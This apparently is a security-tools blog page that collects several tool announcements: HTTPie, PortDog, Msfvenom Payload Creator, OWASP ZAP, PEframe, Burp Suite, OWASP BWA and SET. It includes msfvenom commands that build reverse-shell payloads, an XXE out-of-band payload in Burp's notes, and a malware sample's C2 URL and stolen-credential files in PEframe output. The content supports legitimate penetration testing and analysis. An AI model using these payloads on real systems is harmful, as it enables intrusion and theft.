HTTPie - a CLI, cURL-like tool for humans

HTTPie (pronounced aych-tee-tee-pie) is a command line HTTP client. Its goal is to make CLI interaction with web services as human-friendly as possible. It provides a simple http command that allows for sending arbitrary HTTP requests using a simple and natural syntax, and displays colorized output. HTTPie can be used for testing, debugging, and generally interacting with HTTP servers.

HTTPie is written in Python, and under the hood it uses the excellent Requests and Pygments libraries.

Main Features

• Expressive and intuitive syntax
• Formatted and colorized terminal output
• Built-in JSON support
• Forms and file uploads
• HTTPS, proxies, and authentication
• Arbitrary request data
• Custom headers
• Persistent sessions
• Wget-like downloads
• Python 2.6, 2.7 and 3.x support
• Linux, Mac OS X and Windows support
• Plugins
• Documentation
• Test coverage

Installation

On Mac OS X, HTTPie can be installed via Homebrew:

$ brew install httpie

Most Linux distributions provide a package that can be installed using the system package manager, e.g.:

# Debian-based distributions such as Ubuntu:
$ apt-get install httpie

# RPM-based distributions:
$ yum install httpie

A universal installation method (that works on Windows, Mac OS X, Linux, …, and provides the latest version) is to use pip:

# Make sure we have an up-to-date version of pip and setuptools:
$ pip install --upgrade pip setuptools

$ pip install --upgrade httpie

(If pip installation fails for some reason, you can try easy_install httpie as a fallback.)

Development version
The latest development version can be installed directly from GitHub:

# Mac OS X via Homebrew
$ brew install httpie --HEAD

# Universal
$ pip install --upgrade https://github.com/jkbrzt/httpie/tarball/master

Usage

Hello World:

$ http httpie.org

Synopsis:

$ http [flags] [METHOD] URL [ITEM [ITEM]]

See also http --help.

Examples
Custom HTTP method, HTTP headers and JSON data:

$ http PUT example.org X-API-Token:123 name=John

Submitting forms:

$ http -f POST example.org hello=World

See the request that is being sent using one of the output options:

$ http -v example.org

Use Github API to post a comment on an issuewith authentication:

$ http -a USERNAME POST https://api.github.com/repos/jkbrzt/httpie/issues/83/comments body='HTTPie is awesome!'

Upload a file using redirected input:

$ http example.org < file.json

Download a file and save it via redirected output:

$ http example.org/file > file

Download a file wget style:

$ http --download example.org/file

Use named sessions to make certain aspects or the communication persistent between requests to the same host:

$ http --session=logged-in -a username:password httpbin.org/get API-Key:123$ http --session=logged-in httpbin.org/headers

Set a custom Host header to work around missing DNS records:

$ http localhost:8000 Host:example.com

---

What follows is a detailed documentation. It covers the command syntax, advanced usage, and also features additional examples.

HTTP Method

The name of the HTTP method comes right before the URL argument:

$ http DELETE example.org/todos/7

Which looks similar to the actual Request-Line that is sent:

DELETE /todos/7 HTTP/1.1

When the METHOD argument is omitted from the command, HTTPie defaults to either GET (with no request data) or POST (with request data).

Request URL

The only information HTTPie needs to perform a request is a URL. The default scheme is, somewhat unsurprisingly, http://, and can be omitted from the argument – http example.org works just fine.
Additionally, curl-like shorthand for localhost is supported. This means that, for example :3000 would expand to http://localhost:3000If the port is omitted, then port 80 is assumed.

$ http :/foo

GET /foo HTTP/1.1
Host: localhost

$ http :3000/bar

GET /bar HTTP/1.1
Host: localhost:3000

$ http :

GET / HTTP/1.1
Host: localhost

If you find yourself manually constructing URLs with querystring parameterson the terminal, you may appreciate the param==value syntax for appending URL parameters so that you don't have to worry about escaping the &separators. To search for HTTPie on Google Images you could use this command:

$ http GET www.google.com search==HTTPie tbm==isch

GET /?search=HTTPie&tbm=isch HTTP/1.1

Download HTTPie

Read More

A Cidade Mais Perigosa da Internet

Assista o documentário sobre cibercrime que apresenta a cidade romena chamada “Hackerville” ou a “Cidade mais perigosa da Internet”. Hackers blackhat condenados, como Guccifer (nome real), falam sobre worms, vírus, engenharia social, roubo de identidade e até sobre invadir o e-mail de Hillary Clinton.


By: OffensiveSec 2016

Read More

PortDog - Simple Python Script to Detect Port Scanning Techniques

PortDog is a network anomaly detector aimed to detect port scanning techniques. It is entirely written in python and has easy-to-use interface. It was tested on Ubuntu 15. Please note that, it is not working on Windows OS due to suffering from capturing RAW packets.I am working on to write this script to work both platforms. In future , I'am thinking about adding firewall options that could block malicious attempts. It is using Raw packets for analysis. For this reason, please ensure that you have run this script from privileged session.

Usage:

sudo python portdog.py -t time_for_sniff_in_minutes

For example, if you want to detect for 5 minutes use:

sudo python portdog.py -t 5

For infinite detection use:

sudo python portdog.py -t 0

If you want to get list of scanned ports , press CTRL+C to get port list at runtime (If scan was happened).

Download PortDog

Read More

MPC - Msfvenom Payload Creator

Msfvenom Payload Creator (MPC) is a wrapper to generate multiple types of payloads, based on users choice. The idea is to be as simple as possible (only requiring one input) to produce their payload.

Fully automating msfvenom & Metasploit is the end goal (well as to be be able to automate MPC itself). The rest is to make the user's life as easy as possible (e.g. IP selection menu, msfconsole resource file/commands, batch payload production and able to enter any argument in any order (in various formats/patterns)).

The only necessary input from the user should be defining the payload they want by either the platform (e.g. windows), or the file extension they wish the payload to have (e.g. exe).

• Can't remember your IP for a interface? Don't sweat it, just use the interface name: eth0.
• Don't know what your external IP is? MPC will discover it: wan.
• Want to generate one of each payload? No issue! Try: loop.
• Want to mass create payloads? Everything? Or to filter your select? ..Either way, its not a problem. Try: batch (for everything), batch msf (for every Meterpreter option), batch staged (for every staged payload), or batch cmd stageless (for every stageless command prompt)!

Note: This will not try to bypass any anti-virus solutions.

Install

• Designed for Kali Linux v1.1.0a+ & Metasploit v4.11+ (nothing else has been tested).

curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/mpc.sh" > /usr/bin/mpc
chmod +x /usr/bin/mpc
mpc

Help

root@kali:~# mpc -h -v
 [*] Msfvenom Payload Creator (MPC v1.3)

 [i] /usr/bin/mpc <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)
 [i]   Example: /usr/bin/mpc windows 192.168.1.10        # Windows & manual IP.
 [i]            /usr/bin/mpc elf eth0 4444               # Linux, eth0's IP & manual port.
 [i]            /usr/bin/mpc stageless cmd py verbose    # Python, stageless command prompt.
 [i]            /usr/bin/mpc loop eth1                   # A payload for every type, using eth1's IP.
 [i]            /usr/bin/mpc msf batch wan               # All possible Meterpreter payloads, using WAN IP.
 [i]            /usr/bin/mpc help verbose                # This help screen, with even more information.

 [i] <TYPE>:
 [i]   + ASP
 [i]   + ASPX
 [i]   + Bash [.sh]
 [i]   + Java [.jsp]
 [i]   + Linux [.elf]
 [i]   + OSX [.macho]
 [i]   + Perl [.pl]
 [i]   + PHP
 [i]   + Powershell [.ps1]
 [i]   + Python [.py]
 [i]   + Tomcat [.war]
 [i]   + Windows [.exe]

 [i] Rather than putting <DOMAIN/IP>, you can do a interface and MPC will detect that IP address.
 [i] Missing <DOMAIN/IP> will default to the IP menu.

 [i] Missing <PORT> will default to 443.

 [i] <CMD> is a standard/native command prompt/terminal to interactive with.
 [i] <MSF> is a custom cross platform Meterpreter shell, gaining the full power of Metasploit.
 [i] Missing <CMD/MSF> will default to <MSF> where possible.
 [i]   Note: Metasploit doesn't (yet!) support <CMD/MSF> for every <TYPE> format.
 [i] <CMD> payloads are generally smaller than <MSF> and easier to bypass EMET. Limit Metasploit post modules/scripts support.
 [i] <MSF> payloads are generally much larger than <CMD>, as it comes with more features.

 [i] <BIND> opens a port on the target side, and the attacker connects to them. Commonly blocked with ingress firewalls rules on the target.
 [i] <REVERSE> makes the target connect back to the attacker. The attacker needs an open port. Blocked with engress firewalls rules on the target.
 [i] Missing <BIND/REVERSE> will default to <REVERSE>.
 [i] <BIND> allows for the attacker to connect whenever they wish. <REVERSE> needs to the target to be repeatedly connecting back to permanent maintain access.

 [i] <STAGED> splits the payload into parts, making it smaller but dependent on Metasploit.
 [i] <STAGELESS> is the complete standalone payload. More 'stable' than <STAGED>.
 [i] Missing <STAGED/STAGELESS> will default to <STAGED> where possible.
 [i]   Note: Metasploit doesn't (yet!) support <STAGED/STAGELESS> for every <TYPE> format.
 [i] <STAGED> are 'better' in low-bandwidth/high-latency environments.
 [i] <STAGELESS> are seen as 'stealthier' when bypassing Anti-Virus protections. <STAGED> may work 'better' with IDS/IPS.
 [i] More information: https://community.rapid7.com/community/metasploit/blog/2015/03/25/stageless-meterpreter-payloads
 [i]                   https://www.offensive-security.com/metasploit-unleashed/payload-types/
 [i]                   https://www.offensive-security.com/metasploit-unleashed/payloads/

 [i] <TCP> is the standard method to connecting back. This is the most compatible with TYPES as its RAW. Can be easily detected on IDSs.
 [i] <HTTP> makes the communication appear to be HTTP traffic (unencrypted). Helpful for packet inspection, which limit port access on protocol - e.g. TCP 80.
 [i] <HTTPS> makes the communication appear to be (encrypted) HTTP traffic using as SSL. Helpful for packet inspection, which limit port access on protocol - e.g. TCP 443.
 [i] <FIND_PORT> will attempt every port on the target machine, to find a way out. Useful with stick ingress/engress firewall rules. Will switch to 'allports' based on <TYPE>.
 [i] Missing <TCP/HTTP/HTTPS/FIND_PORT> will default to <TCP>.
 [i] By altering the traffic, such as <HTTP> and even more <HTTPS>, it will slow down the communication & increase the payload size.
 [i] More information: https://community.rapid7.com/community/metasploit/blog/2011/06/29/meterpreter-httphttps-communication

 [i] <BATCH> will generate as many combinations as possible: <TYPE>, <CMD + MSF>, <BIND + REVERSE>, <STAGED + STAGLESS> & <TCP + HTTP + HTTPS + FIND_PORT>
 [i] <LOOP> will just create one of each <TYPE>.

 [i] <VERBOSE> will display more information.
root@kali:~#

Example #1 (Windows, Fully Automated With IP)

root@kali:~# mpc windows 192.168.1.10
 [*] Msfvenom Payload Creator (MPC v1.3)
 [i]   IP: 192.168.1.10
 [i] PORT: 443
 [i] TYPE: windows (windows/meterpreter/reverse_tcp)
 [i]  CMD: msfvenom -p windows/meterpreter/reverse_tcp -f exe --platform windows -a x86 -e generic/none LHOST=192.168.1.10 LPORT=443 > /root/windows-meterpreter-staged-reverse-tcp-443.exe
 [i] File (/root/windows-meterpreter-staged-reverse-tcp-443.exe) already exists. Overwriting...
 [i] windows meterpreter created: '/root/windows-meterpreter-staged-reverse-tcp-443.exe'
 [i] MSF handler file: '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'   (msfconsole -q -r /root/windows-meterpreter-staged-reverse-tcp-443-exe.rc)
 [?] Quick web server for file transfer?   python -m SimpleHTTPServer 8080
 [*] Done!
root@kali:~#

Example #2 (Linux Format, Fully Automated With Interface and Port)

root@kali:~# ./mpc elf eth0 4444
 [*] Msfvenom Payload Creator (MPC v1.3)
 [i]   IP: 192.168.103.238
 [i] PORT: 4444
 [i] TYPE: linux (linux/x86/shell/reverse_tcp)
 [i]  CMD: msfvenom -p linux/x86/shell/reverse_tcp -f elf --platform linux -a x86 -e generic/none LHOST=192.168.103.238 LPORT=4444 > /root/linux-shell-staged-reverse-tcp-4444.elf
 [i] linux shell created: '/root/linux-shell-staged-reverse-tcp-4444.elf'
 [i] MSF handler file: '/root/linux-shell-staged-reverse-tcp-4444-elf.rc'   (msfconsole -q -r /root/linux-shell-staged-reverse-tcp-4444-elf.rc)
 [?] Quick web server for file transfer?   python -m SimpleHTTPServer 8080
 [*] Done!
root@kali:~#

Example #3 (Python Format, Stageless Command Prompt Using Interactive IP Menu)

root@kali:~# mpc stageless cmd py verbose
 [*] Msfvenom Payload Creator (MPC v1.3)

 [i] Use which interface/IP address?:
 [i]   1.) eth0 - 192.168.103.238
 [i]   2.) eth1 - 192.168.155.175
 [i]   3.) tap0 - 10.10.100.63
 [i]   4.) lo - 127.0.0.1
 [i]   5.) wan - xx.xx.xx.xx
 [?] Select 1-5, interface or IP address: 3

 [i]        IP: 10.10.100.63
 [i]      PORT: 443
 [i]      TYPE: python (python/shell_reverse_tcp)
 [i]     SHELL: shell
 [i] DIRECTION: reverse
 [i]     STAGE: stageless
 [i]    METHOD: tcp
 [i]       CMD: msfvenom -p python/shell_reverse_tcp -f raw --platform python -e generic/none -a python LHOST=10.10.100.63 LPORT=443 > /root/python-shell-stageless-reverse-tcp-443.py
 [i] python shell created: '/root/python-shell-stageless-reverse-tcp-443.py'
 [i] File: ASCII text, with very long lines, with no line terminators
 [i] Size: 4.0K
 [i]  MD5: 53452eafafe21bff94e6c4621525165b
 [i] SHA1: 18641444f084c5fe7e198c29bf705a68b15c2cc9
 [i] MSF handler file: '/root/python-shell-stageless-reverse-tcp-443-py.rc'   (msfconsole -q -r /root/python-shell-stageless-reverse-tcp-443-py.rc)
 [?] Quick web server for file transfer?   python -m SimpleHTTPServer 8080
 [*] Done!
root@kali:~#

To-Do List

• Shellcode generation
• x64 payloads
• IPv6 support
• Look into using OS scripting more (powershell_bind_tcp & bind_perl etc)

Download Msfvenom Payload Creator

Read More

OWASP ZAP 2.4.1 - Penetration Testing Tool for Testing Web Applications

The OWASP Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications.

It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing as well as being a useful addition to an experienced pen testers toolbox.

Release 2.4.1

This release includes important security fixes - users are urged to upgrade asap.

One of the changes means that an API key is created by default, which means that any applications using the ZAP API will fail unless they are updated to use that key. The API Key can be found in the API Options screenYou can also set it from the command line using an option like:

-config api.key=change-me-9203935709

For more details see https://github.com/zaproxy/zaproxy/wiki/FAQapikey

The following changes were made in this release:

Enhancements:

• Issue 321 : Support multiple databases
• Issue 1459 : Add an HTTP sender listener script
• Issue 1500 : Update Bouncy Castle libs
• Issue 1566 : Improve active scan's reported progress
• Issue 1573 : Add option to inject plugin ID in header for all ascan requests
• Issue 1607 : Unable to save the test session via API
• Issue 1621 : AScan API - Allow to scan as an user
• Issue 1625 : Support multiple structural params and ones on top level nodes
• Issue 1653 : Support context menu key for trees
• Issue 1655 : Copy Session Token from Http Sessions tab to clipboard
• Issue 1662 : Add default Rails anti-CSRF token parameter
• Issue 1664 : Clients tab autoscroll
• Issue 1684 : Unable to set technology via API
• Issue 1688 : Updating owasp/zap2docker image with Python Client API
• Issue 1690 : Bump key pair size to 2048 for all certs in the (proxy's) chain of trust
• Issue 1695 : Change SSL cert signature algorithm to "SHA-256 with RSA Encryption"
• Issue 1699 : Allow ApiImplementor's to add custom headers
• Issue 1715 : Unable to pass arguments when launching ZAP from the command line on Mac OS X
• Issue 1728 : Update JRE to 1.7u79 (CPU) for MacOS

Bug fixes:

• Issue 444 : Guaranteed NPE on AliasCertificate.getName() if getCN()==null
• Issue 1442 : Up/Down arrow keys in results stop working if "reflected"
• Issue 1473 : Spider does not handle URLs extracted from meta tags correctly
• Issue 1497 : The spider is extracting and reporting links from comments - event when instructed not to do so
• Issue 1598 : startup script lacks support for FreeBSD
• Issue 1615 : Search "All" option not working
• Issue 1617 : ZAP 2.4.0 throws HeadlessExceptions when running in daemon mode on headless machine
• Issue 1618 : Target Technology Not Honored
• Issue 1619 : Search regex might not be validated
• Issue 1624 : Error while loading ZAP 2.4.0
• Issue 1626 : Structural parameters not saved when context exported and not available via the API
• Issue 1636 : Users (for auth) & Forced User not loaded from session
• Issue 1647 : Wrong reference in Zest Result
• Issue 1674 : Ajax spider not considering get parameters
• Issue 1677 : Fuzzers can't be expanded on OS X
• Issue 1694 : "Error: setting file is missing. Program will exit." even if file exists
• Issue 1698 : Escape API exceptions
• Issue 1700 : Forced Browse Lists Missing from Drop-Down in 2.4.0
• Issue 1706 : Add API security options
• Issue 1708 : Context's technology tree can get out of sync
• Issue 1709 : Applications are not (immediately) shown after start
• Issue 1714 : PNH should not reflect API key unless user supplies it
• Issue 1716 : Restrict use of CORS header in pnh
• Issue 1720 : Add more security options for JSONP API
• Issue 1724 : Ensure API component names are escaped in the HTML output
• Issue 1735 : Context's technologies not used in active scan unless overridden

Download OWASP ZAP 2.4.1

Read More

PEframe - Tool to perform static analysis on Portable Executable malware

PEframe is a open source tool to perform static analysis on Portable Executable malware.

Usage

$ peframe malware.exe
$ peframe [--option] malware.exe

Options

--json         Output in json

--import       Imported function and dll
--export       Exported function and dll

--dir-import   Import directory
--dir-export   Export directory
--dir-resource Resource directory
--dir-debug    Debug directory
--dir-tls      TLS directory

--strings      Get all strings
--sections     Sections information
--dump         Dump all information

Install
Prerequisites

Python 2.6.5 -> 2.7.x

Install
from pypi

# pip install https://github.com/guelfoweb/peframe/archive/master.zip

from git

$ git clone https://github.com/guelfoweb/peframe.git

$ cd peframe

# python setup.py install

Example

$ peframe malware.exe

Short information
------------------------------------------------------------
File Name          malware.exe
File Size          935281 byte
Compile Time       2012-01-29 22:32:28
DLL                False
Sections           4
Hash MD5           cae18bdb8e9ef082816615e033d2d85b
Hash SAH1          546060ad10a766e0ecce1feb613766a340e875c0
Imphash            353cf96592db561b5ab4e408464ac6ae
Detected           Xor, Sign, Packer, Anti Debug, Anti VM
Directory          Import, Resource, Debug, Relocation, Security

XOR discovered
------------------------------------------------------------
Key length         Offset (hex)       Offset (dec)
1                  0x5df4e            384846
2                  0x5df4e            384846
4                  0x5df4e            384846
8                  0x5df4e            384846

Digital Signature
------------------------------------------------------------
Virtual Address    12A200
Block Size         4813 byte
Hash MD5           63b8c4daec26c6c074ca5977f067c21e
Hash SHA-1         53731a283d0c251f7c06f6d7d423124689873c62

Packer matched [4]
------------------------------------------------------------
Packer             Microsoft Visual C++ v6.0
Packer             Microsoft Visual C++ 5.0
Packer             Microsoft Visual C++
Packer             Installer VISE Custom

Anti Debug discovered [9]
------------------------------------------------------------
Anti Debug         FindWindowExW
Anti Debug         FindWindowW
Anti Debug         GetWindowThreadProcessId
Anti Debug         IsDebuggerPresent
Anti Debug         OutputDebugStringW
Anti Debug         Process32FirstW
Anti Debug         Process32NextW
Anti Debug         TerminateProcess
Anti Debug         UnhandledExceptionFilter

Anti VM Trick discovered [2]
------------------------------------------------------------
Trick              Virtual Box
Trick              VMware trick

Suspicious API discovered [35]
------------------------------------------------------------
Function           CreateDirectoryA
Function           CreateFileA
Function           CreateFileMappingA
Function           CreateToolhelp32Snapshot
Function           DeleteFileA
Function           FindFirstFileA
Function           FindNextFileA
Function           GetCurrentProcess
Function           GetFileAttributesA
Function           GetFileSize
Function           GetModuleHandleA
Function           GetProcAddress
Function           GetTempPathA
Function           GetTickCount
Function           GetUserNameA
Function           GetVersionExA
Function           InternetCrackUrlA
Function           LoadLibraryA
Function           MapViewOfFile
Function           OpenProcess
Function           Process32First
Function           Process32Next
Function           RegCloseKey
Function           RegCreateKeyA
Function           RegEnumKeyExA
Function           RegOpenKeyA
Function           RegOpenKeyExA
Function           Sleep
Function           WSAStartup
Function           WriteFile
Function           closesocket
Function           connect
Function           recv
Function           send
Function           socket

Suspicious Sections discovered [2]
------------------------------------------------------------
Section            .data
Hash MD5           b896a2c4b2be73b89e96823c1ed68f9c
Hash SHA-1         523d58892f0375c77e5e1b6f462005ae06cdd0d8
Section            .rdata
Hash MD5           41795b402636cb13e2dbbbec031dbb1a
Hash SHA-1         b674141b34f843d54865a399edfca44c3757df59

File name discovered [43]
------------------------------------------------------------
Binary             wiseftpsrvs.bin
Data               ESTdb2.dat
Data               Favorites.dat
Data               History.dat
Data               bookmark.dat
Data               fireFTPsites.dat
Data               quick.dat
Data               site.dat
Data               sites.dat
Database           FTPList.db
Database           sites.db
Database           NovaFTP.db
Executable         unleap.exe
Executable         explorer.exe
FTP Config         FTPVoyager.ftp
Library            crypt32.dll
Library            kernel32.dll
Library            mozsqlite3.dll
Library            userenv.dll
Library            wand.dat
Library            wininet.dll
Library            wsock32.dll
Text               Connections.txt
Text               ftplist.txt
Text               signons.txt
Text               signons2.txt
Text               signons3.txt

Url discovered [2]
------------------------------------------------------------
Url                RhinoSoft.com
Url                http://0uk.net/zaaqw/gate.php

Meta data found [4]
------------------------------------------------------------
CompiledScript      AutoIt v3 Script
FileVersion         3, 3, 8, 1
FileDescription
Translation         0x0809 0x04b0

Download PEframe

Read More

Burp Suite Professional v1.6.23 - The Leading Toolkit for Web Application Security Testing

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.

Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun.

Burp Suite contains the following key components:

• An intercepting Proxy, which lets you inspect and modify traffic between your browser and the target application.
• An application-aware Spider, for crawling content and functionality.
• An advanced web application Scanner, for automating the detection of numerous types of vulnerability.
• An Intruder tool, for performing powerful customized attacks to find and exploit unusual vulnerabilities.
• A Repeater tool, for manipulating and resending individual requests.
• A Sequencer tool, for testing the randomness of session tokens.
• The ability to save your work and resume working later.
• Extensibility, allowing you to easily write your own plugins, to perform complex and highly customized tasks within Burp.

Burp is easy to use and intuitive, allowing new users to begin working right away. Burp is also highly configurable, and contains numerous powerful features to assist the most experienced testers with their work.

Release Notes

v1.6.23

This release adds a new scan check for external service interaction and out-of-band resource load via injected XML doctype tags containing entity parameters. Burp now sends payloads like:

<?xml version='1.0' standalone='no'?><!DOCTYPE foo [<!ENTITY % f5a30 SYSTEM "http://u1w9aaozql7z31394loost.burpcollaborator.net">%f5a30; ]>

and reports an appropriate issue based on any observed interactions (DNS or HTTP) that reach the Burp Collaborator server.

The release also fixes some issues:

• Some bugs affecting the saving and restoring of Burp state files.
• A bug in the Collaborator server where the auto-generated self-signed certificate does not use a wildcard prefix in the CN. This issue only affects private Collaborator server deployments where a custom SSL certificate has not been configured.

Download Burp Suite Professional v1.6.23

Read More

BWA - OWASP Broken Web Applications Project

A collection of vulnerable web applications that is distributed on a Virtual Machine.

Description

The Broken Web Applications (BWA) Project produces a Virtual Machine running a variety of applications with known vulnerabilities for those interested in:

• learning about web application security
• testing manual assessment techniques
• testing automated tools
• testing source code analysis tools
• observing web attacks
• testing WAFs and similar code technologies

All the while saving people interested in doing either learning or testing the pain of having to compile, configure, and catalog all of the things normally involved in doing this process from scratch.

Download OWASP Broken Web Applications Project

Read More

SET v6.5 - The Social-Engineer Toolkit “Mr Robot”

The Social-Engineer Toolkit (SET) was created and written by the founder of TrustedSec. It is an open-source Python-driven tool aimed at penetration testing around Social-Engineering. SET has been presented at large-scale conferences including Blackhat, DerbyCon, Defcon, and ShmooCon. With over two million downloads, SET is the standard for social-engineering penetration tests and supported heavily within the security community.

The Social-Engineer Toolkit has over 2 million downloads and is aimed at leveraging advanced technological attacks in a social-engineering type environment. TrustedSec believes that social-engineering is one of the hardest attacks to protect against and now one of the most prevalent. The toolkit has been featured in a number of books including the number one best seller in security books for 12 months since its release, “Metasploit: The Penetrations Tester’s Guide” written by TrustedSec’s founder as well as Devon Kearns, Jim O’Gorman, and Mati Aharoni.

The next major revision of The Social-Engineer Toolkit (SET) v6.5 codename “Mr Robot” has just been released. The codename is in celebration of the TV show Mr Robot featuring SET last night! Kudos to them for having some amazing tech writers and appreciate the shoutout on the show.

 This version incorporates a new HTA web attack vector (thanks Justin Elze aka ginger) for sharing the attack vector with me. This attack allows you to clone a website and inject an HTA file which compromises the system.

Additionally, SET added a lot of the new exploits including the hacking team adobe zero-day, and others from Metasploit.

Full changelog below:

~~~~~~~~~~~~~~~~
version 6.5
~~~~~~~~~~~~~~~~
* added brand new attack vector HTA attack and incorporated powershell injection into it
* fixed a prompt that would cause double IP questions in certain attack vectors
* slimmed down powershell injection http/https attack vectors in order to use in payload delivery
* added exploit to browser attack Adobe Flash Player ByteArray Use After Free (2015-07-06)
* added exploit to browser attack Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow (2015-06-23)
* added exploit to browser attack Adobe Flash Player Drawing Fill Shader Memory Corruption (2015-05-12)

Supported platforms

• Linux
• Windows (experimental)

Download SET v6.5 

Read More